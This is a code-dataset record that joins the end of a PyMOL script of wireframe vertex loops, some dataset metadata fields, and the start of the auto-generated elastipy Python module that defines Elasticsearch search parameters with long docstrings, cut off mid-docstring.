VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.246, 35.103, 33.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.254, 35.467, 32.997,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.298, 35.218, 33.616,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.259, 34.857, 33.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.298, 35.218, 33.616,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.139, 34.916, 34.469,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.054, 34.519, 34.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.139, 34.916, 34.469,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 22.868, 34.740, 35.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.750, 34.287, 35.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.868, 34.740, 35.056,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.646, 34.791, 35.032,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.646, 34.791, 35.032,
VERTEX, 22.527, 34.297, 35.006,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.514, 34.543, 34.384,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.519, 34.018, 34.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.514, 34.543, 34.384,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.719, 34.881, 33.554,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 22.767, 34.400, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.719, 34.881, 33.554,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 23.022, 35.113, 33.004,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 23.022, 35.113, 33.004,
VERTEX, 23.093, 34.693, 33.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.022, 35.113, 33.004,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.246, 35.103, 33.056,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.305, 34.726, 33.151,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.246, 35.103, 33.056,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.259, 34.857, 33.678,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.279, 34.478, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.259, 34.857, 33.678,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.054, 34.519, 34.507,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 23.031, 34.096, 34.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.054, 34.519, 34.507,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 22.750, 34.287, 35.057,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.705, 33.803, 35.076,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.750, 34.287, 35.057,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.527, 34.297, 35.006,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.527, 34.297, 35.006,
VERTEX, 22.493, 33.770, 34.995,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.519, 34.018, 34.373,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.622, 33.527, 34.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.519, 34.018, 34.373,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.767, 34.400, 33.576,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 22.907, 33.959, 33.584,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.767, 34.400, 33.576,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.093, 34.693, 33.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.245, 34.309, 33.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.093, 34.693, 33.070,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.305, 34.726, 33.151,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.438, 34.372, 33.233,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.305, 34.726, 33.151,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.279, 34.478, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.372, 34.112, 33.846,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.279, 34.478, 33.773,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.031, 34.096, 34.570,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 23.086, 33.680, 34.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.031, 34.096, 34.570,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 22.705, 33.803, 35.076,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.748, 33.330, 35.064,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.705, 33.803, 35.076,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 22.493, 33.770, 34.995,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 22.493, 33.770, 34.995,
VERTEX, 22.556, 33.266, 34.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 22.622, 33.527, 34.343,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.925, 33.294, 33.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.622, 33.527, 34.343,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 22.907, 33.959, 33.584,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.004, 33.415, 33.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.907, 33.959, 33.584,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.245, 34.309, 33.125,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.181, 33.557, 33.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.245, 34.309, 33.125,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.438, 34.372, 33.233,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.352, 33.638, 33.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.438, 34.372, 33.233,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.372, 34.112, 33.846,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.418, 33.610, 34.122,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.372, 34.112, 33.846,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.086, 33.680, 34.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 23.339, 33.489, 34.301,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.086, 33.680, 34.605,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 22.748, 33.330, 35.064,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 23.162, 33.347, 34.336,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.748, 33.330, 35.064,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 22.556, 33.266, 34.956,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 22.556, 33.266, 34.956,
VERTEX, 22.991, 33.266, 34.206,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 22.925, 33.294, 33.988,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 23.185, 32.961, 33.882,
END,
BEGIN, LINE_LOOP,
VERTEX, 22.925, 33.294, 33.988,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.004, 33.415, 33.809,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.269, 33.094, 33.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.004, 33.415, 33.809,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.181, 33.557, 33.774,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.435, 33.252, 33.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.181, 33.557, 33.774,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.352, 33.638, 33.904,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.586, 33.342, 33.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.352, 33.638, 33.904,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.418, 33.610, 34.122,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.634, 33.312, 34.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.418, 33.610, 34.122,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.339, 33.489, 34.301,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 23.550, 33.178, 34.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.339, 33.489, 34.301,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.162, 33.347, 34.336,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 23.384, 33.021, 34.252,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.162, 33.347, 34.336,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 22.991, 33.266, 34.206,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 22.991, 33.266, 34.206,
VERTEX, 23.233, 32.930, 34.104,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.185, 32.961, 33.882,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.494, 32.676, 33.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.185, 32.961, 33.882,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.269, 33.094, 33.714,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.581, 32.821, 33.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.269, 33.094, 33.714,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.435, 33.252, 33.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.735, 32.991, 33.610,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.435, 33.252, 33.700,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 23.586, 33.342, 33.848,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.867, 33.086, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.586, 33.342, 33.848,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 23.634, 33.312, 34.070,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.898, 33.050, 33.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.634, 33.312, 34.070,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 23.550, 33.178, 34.238,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.811, 32.904, 34.152,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.550, 33.178, 34.238,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 23.384, 33.021, 34.252,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 23.657, 32.734, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.384, 33.021, 34.252,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.233, 32.930, 34.104,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.233, 32.930, 34.104,
VERTEX, 23.525, 32.640, 33.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.855, 32.384, 33.867,
VERTEX, 23.494, 32.676, 33.759,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.855, 32.384, 33.867,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.840, 32.427, 33.642,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.494, 32.676, 33.759,
VERTEX, 23.840, 32.427, 33.642,
VERTEX, 23.581, 32.821, 33.605,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.840, 32.427, 33.642,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.928, 32.584, 33.500,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.581, 32.821, 33.605,
VERTEX, 23.928, 32.584, 33.500,
VERTEX, 23.735, 32.991, 33.610,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.928, 32.584, 33.500,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 24.069, 32.764, 33.524,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.735, 32.991, 33.610,
VERTEX, 24.069, 32.764, 33.524,
VERTEX, 23.867, 33.086, 33.773,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.069, 32.764, 33.524,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 24.180, 32.861, 33.700,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.867, 33.086, 33.773,
VERTEX, 24.180, 32.861, 33.700,
VERTEX, 23.898, 33.050, 33.997,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.180, 32.861, 33.700,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 24.195, 32.818, 33.925,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.898, 33.050, 33.997,
VERTEX, 24.195, 32.818, 33.925,
VERTEX, 23.811, 32.904, 34.152,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.195, 32.818, 33.925,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 24.107, 32.661, 34.067,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.811, 32.904, 34.152,
VERTEX, 24.107, 32.661, 34.067,
VERTEX, 23.657, 32.734, 34.147,
END,
BEGIN, LINE_LOOP,
VERTEX, 24.107, 32.661, 34.067,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.966, 32.481, 34.043,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.657, 32.734, 34.147,
VERTEX, 23.966, 32.481, 34.043,
VERTEX, 23.525, 32.640, 33.984,
END,
BEGIN, LINE_LOOP,
VERTEX, 23.966, 32.481, 34.043,
VERTEX, 23.525, 32.640, 33.984,
VERTEX, 23.855, 32.384, 33.867,
END,
]
# Register the CGO vertex list built above as a display object named 'cartoon_wf'.
# NOTE(review): `cmd` is presumably PyMOL's `pymol.cmd` module and `cartoon_wf` is the
# list of CGO primitives defined earlier in this file — confirm against the full script.
cmd.load_cgo(cartoon_wf, 'cartoon_wf')
# Turn on two-sided lighting so the back faces of the wireframe loops are lit as well.
cmd.set('two_sided_lighting', 'on')
| 23.766417
| 41
| 0.67168
| 64,135
| 304,733
| 3.151431
| 0.016153
| 0.113993
| 0.164657
| 0.240653
| 0.999218
| 0.998575
| 0.998352
| 0.998095
| 0.997873
| 0.997873
| 0
| 0.431543
| 0.126271
| 304,733
| 12,821
| 42
| 23.768271
| 0.327571
| 0
| 0
| 0.998362
| 0
| 0
| 0.000098
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.000156
| 0
| 0.000156
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
083c0d03c8076693a48cc0fa54ab840e42267ada
| 58,823
|
py
|
Python
|
elastipy/generated_search_param.py
|
defgsus/elastipy
|
c1144ab39fa70571ba0e02ccf41d380a8a1bd730
|
[
"Apache-2.0"
] | 1
|
2021-02-17T17:50:28.000Z
|
2021-02-17T17:50:28.000Z
|
elastipy/generated_search_param.py
|
defgsus/elastipy
|
c1144ab39fa70571ba0e02ccf41d380a8a1bd730
|
[
"Apache-2.0"
] | 2
|
2021-03-29T02:09:41.000Z
|
2022-03-01T20:09:48.000Z
|
elastipy/generated_search_param.py
|
netzkolchose/elastipy
|
c1144ab39fa70571ba0e02ccf41d380a8a1bd730
|
[
"Apache-2.0"
] | null | null | null |
# auto-generated file - do not edit
from datetime import date, datetime
from typing import Mapping, Sequence, Any, Union, Optional
from .search_param import SearchParametersBase
from .search import Search
class Unset:
    """Sentinel class marking parameters that were not explicitly provided.

    Used as a default value so that ``None`` remains a legal, distinguishable
    argument value.
    """
class SearchParameters(SearchParametersBase):
    # make sure sphinx gets the documentation string
__doc__ = SearchParametersBase.__doc__
DEFINITION = {'_source': {'default': True, 'group': 'body'}, '_source_excludes': {'group': 'query'}, '_source_includes': {'group': 'query'}, 'allow_no_indices': {'default': True, 'group': 'query'}, 'allow_partial_search_results': {'default': True, 'group': 'query'}, 'batched_reduce_size': {'default': 512, 'group': 'query'}, 'ccs_minimize_roundtrips': {'default': True, 'group': 'query'}, 'docvalue_fields': {'group': 'body'}, 'expand_wildcards': {'default': 'open', 'group': 'query'}, 'explain': {'default': False, 'group': 'body'}, 'fields': {'group': 'body'}, 'from': {'default': 0, 'group': 'body'}, 'ignore_throttled': {'default': True, 'group': 'query'}, 'ignore_unavailable': {'default': False, 'group': 'query'}, 'indices_boost': {'group': 'body'}, 'max_concurrent_shard_requests': {'default': 5, 'group': 'query'}, 'min_score': {'group': 'body'}, 'pre_filter_shard_size': {'group': 'query'}, 'preference': {'group': 'query'}, 'q': {'group': 'query'}, 'request_cache': {'group': 'query'}, 'rest_total_hits_as_int': {'default': False, 'group': 'query'}, 'routing': {'group': 'query'}, 'scroll': {'group': 'query'}, 'search_type': {'default': 'query_then_fetch', 'group': 'query'}, 'seq_no_primary_term': {'default': False, 'group': 'body'}, 'size': {'default': 10, 'group': 'body'}, 'sort': {'group': 'body'}, 'stats': {'group': 'body'}, 'stored_fields': {'group': 'query'}, 'suggest_field': {'group': 'query'}, 'suggest_text': {'group': 'query'}, 'terminate_after': {'default': 0, 'timeout': {'type': 'str', 'doc': 'Specifies the period of time to wait for a response in\n[time units](https://www.elastic.co/guide/en/elasticsearch/reference/current/common-options.html#time-units).\nIf no response is received before the timeout expires,\nthe request fails and returns an error. 
Defaults to no timeout.\n'}, 'group': 'body'}, 'timeout': {'group': 'query'}, 'track_scores': {'default': False, 'group': 'query'}, 'track_total_hits': {'default': 10000, 'group': 'query'}, 'typed_keys': {'default': True, 'group': 'query'}, 'version': {'default': False, 'group': 'query'}}
def __call__(
self,
source: Union[bool, str, Sequence] = Unset,
source_excludes: Optional[str] = Unset,
source_includes: Optional[str] = Unset,
allow_no_indices: bool = Unset,
allow_partial_search_results: bool = Unset,
batched_reduce_size: int = Unset,
ccs_minimize_roundtrips: bool = Unset,
docvalue_fields: Optional[Sequence[Union[str, Mapping[str, str]]]] = Unset,
expand_wildcards: str = Unset,
explain: bool = Unset,
fields: Optional[Sequence[Union[str, Mapping[str, str]]]] = Unset,
from_: int = Unset,
ignore_throttled: bool = Unset,
ignore_unavailable: bool = Unset,
indices_boost: Optional[Sequence[Mapping[str, float]]] = Unset,
max_concurrent_shard_requests: int = Unset,
min_score: Optional[float] = Unset,
pre_filter_shard_size: Optional[int] = Unset,
preference: Optional[str] = Unset,
q: Optional[str] = Unset,
request_cache: Optional[bool] = Unset,
rest_total_hits_as_int: bool = Unset,
routing: Optional[str] = Unset,
scroll: Optional[str] = Unset,
search_type: str = Unset,
seq_no_primary_term: bool = Unset,
size: int = Unset,
sort: Optional[Union[str, Sequence[Union[str, Mapping[str, str]]], Mapping[str, str]]] = Unset,
stats: Optional[Sequence[str]] = Unset,
stored_fields: Optional[str] = Unset,
suggest_field: Optional[str] = Unset,
suggest_text: Optional[str] = Unset,
terminate_after: int = Unset,
timeout: Optional[str] = Unset,
track_scores: bool = Unset,
track_total_hits: Union[int, bool] = Unset,
typed_keys: bool = Unset,
version: bool = Unset,
) -> Search:
"""
Can set all search parameters at once.
Each parameter that is different than it's default value is put into the
search request.
The parameters are automatically split into query and body representation.
:param source: ``Union[bool, str, Sequence]``
Indicates which `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
are returned for matching documents. These fields are returned in the
``hits._source`` property of the search response. Defaults to ``true``.
Valid values:
- ``true`` (Boolean) The entire document source is returned.
- ``false`` (Boolean) The document source is not returned.
- ``<wildcard_pattern>`` (string or array of strings) Wildcard
(``*``) pattern or array of patterns containing source fields to
return.
- ``<object>`` Object containing a list of source fields to include
or exclude. Properties for <object>:
- ``excludes`` (string or array of strings) Wildcard (``*``)
pattern or array of patterns containing source fields to
exclude from the response. You can also use this property to
exclude fields from the subset specified in includes property.
- ``includes`` (string or array of strings) Wildcard (``*``)
pattern or array of patterns containing source fields to
return. If this property is specified, only these source
fields are returned. You can exclude fields from this subset
using the ``excludes`` property.
:param source_excludes: ``Optional[str]``
A comma-separated list of `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
to exclude from the response.
You can also use this parameter to exclude fields from the subset
specified in ``_source_includes`` query parameter.
If the ``_source`` parameter is ``false``, this parameter is ignored.
:param source_includes: ``Optional[str]``
A comma-separated list of `source fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-source-field.html>`__
to include in the response.
If this parameter is specified, only these source fields are returned.
You can exclude fields from this subset using the ``_source_excludes``
query parameter.
If the ``_source`` parameter is ``false``, this parameter is ignored.
:param allow_no_indices: ``bool``
If false, the request returns an error if any wildcard expression,
`index alias
<https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-aliases.html>`__,
or _all value targets only missing or closed indices. This behavior
applies even if the request targets other open indices. For example, a
request targeting ``foo*,bar*`` returns an error if an index starts with
``foo`` but no index starts with ``bar``.
:param allow_partial_search_results: ``bool``
If ``true``, returns partial results if there are request timeouts or
`shard failures
<https://www.elastic.co/guide/en/elasticsearch/reference/current/docs-replication.html#shard-failures>`__.
If ``false``, returns an error with no partial results. Defaults to
``true``.
To override the default for this field, set the
``search.default_allow_partial_results`` cluster setting to false.
:param batched_reduce_size: ``int``
The number of shard results that should be reduced at once on the
coordinating node. This value should be used as a protection mechanism
to reduce the memory overhead per search request if the potential number
of shards in the request can be large. Defaults to ``512``.
:param ccs_minimize_roundtrips: ``bool``
If ``true``, network round-trips between the coordinating node and the
remote clusters are minimized when executing cross-cluster search (CCS)
requests. See `How cross-cluster search handles network delays
<https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cross-cluster-search.html#ccs-network-delays>`__.
Defaults to ``true``.
:param docvalue_fields: ``Optional[Sequence[Union[str, Mapping[str, str]]]]``
Array of wildcard (``*``) patterns. The request returns doc values for
field names matching these patterns in the ``hits.fields`` property of
the response.
You can specify items in the array as a string or object. See `Doc value
fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#docvalue-fields>`__.
Properties of ``docvalue_fields`` objects:
- ``field`` (Required, string) Wildcard pattern. The request returns
doc values for field names matching this pattern.
- ``format`` (Optional, string) Format in which the doc values are
returned.
For `date fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/date.html>`__,
you can specify a [date
format](https://www.elastic.co/guide/en/elasticsearch/reference/current/mapping-date-format.html9.
For `numeric fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/number.html>`__,
you can specify a `DecimalFormat pattern
<https://docs.oracle.com/javase/8/docs/api/java/text/DecimalFormat.html>`__.
For other field data types, this parameter is not supported.
:param expand_wildcards: ``str``
Controls what kind of indices that wildcard expressions can expand to.
Multiple values are accepted when separated by a comma, as in
``open,hidden``. Valid values are:
- ``all`` Expand to open and closed indices, including hidden
indices.
- ``open`` Expand only to open indices.
- ``closed`` Expand only to closed indices.
- ``hidden`` Expansion of wildcards will include hidden indices.
Must be combined with open, closed, or both.
- ``none`` Wildcard expressions are not accepted.
Defaults to ``open``
:param explain: ``bool``
If ``true``, returns detailed information about score computation as
part of a hit. Defaults to ``false``.
:param fields: ``Optional[Sequence[Union[str, Mapping[str, str]]]]``
Array of wildcard (``*``) patterns. The request returns values for field
names matching these patterns in the ``hits.fields`` property of the
response.
You can specify items in the array as a string or object. See `Fields
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-fields.html#search-fields-param>`__
for more details.
Properties of ``fields`` objects:
- ``field`` (Required, string) Wildcard pattern. The request returns
values for field names matching this pattern.
- ``format``
(Optional, string) Format in which the values are returned.
The date fields date and date_nanos accept a date format. Spatial
fields accept either geojson for GeoJSON (the default) or wkt for
Well Known Text.
For other field data types, this parameter is not supported.
:param from_: ``int``
Starting document offset. Defaults to ``0``.
By default, you cannot page through more than ``10,000`` hits using the
from and size parameters. To page through more hits, use the
``search_after`` parameter.
:param ignore_throttled: ``bool``
If ``true``, concrete, expanded or aliased indices will be ignored when
frozen. Defaults to ``true``.
:param ignore_unavailable: ``bool``
If ``true``, missing or closed indices are not included in the response.
Defaults to ``false``.
:param indices_boost: ``Optional[Sequence[Mapping[str, float]]]``
Boosts the ``_score`` of documents from specified indices.
Properties of ``indices_boost`` objects:
``<index>: <boost-value>``
- ``<index>`` is the name of the index or index alias. Wildcard
(``*``) expressions are supported.
- ``<boost-value>`` is the ``float`` factor by which scores are
multiplied.
A boost value greater than ``1.0`` increases the score. A boost
value between ``0`` and ``1.0`` decreases the score.
:param max_concurrent_shard_requests: ``int``
Defines the number of concurrent shard requests per node this search
executes concurrently. This value should be used to limit the impact of
the search on the cluster in order to limit the number of concurrent
shard requests. Defaults to ``5``.
:param min_score: ``Optional[float]``
Minimum ``_score`` for matching documents. Documents with a lower
``_score`` are not included in the search results.
:param pre_filter_shard_size: ``Optional[int]``
Defines a threshold that enforces a pre-filter roundtrip to prefilter
search shards based on query rewriting if the number of shards the
search request expands to exceeds the threshold. This filter roundtrip
can limit the number of shards significantly if for instance a shard can
not match any documents based on its rewrite method ie. if date filters
are mandatory to match but the shard bounds and the query are disjoint.
When unspecified, the pre-filter phase is executed if any of these
conditions is met:
- The request targets more than 128 shards.
- The request targets one or more read-only index.
- The primary sort of the query targets an indexed field.
:param preference: ``Optional[str]``
Nodes and shards used for the search. By default, Elasticsearch selects
from eligible nodes and shards using `adaptive replica selection
<https://www.elastic.co/guide/en/elasticsearch/reference/current/search-shard-routing.html#search-adaptive-replica>`__,
accounting for `allocation awareness
<https://www.elastic.co/guide/en/elasticsearch/reference/current/modules-cluster.html#shard-allocation-awareness>`__.
Valid values:
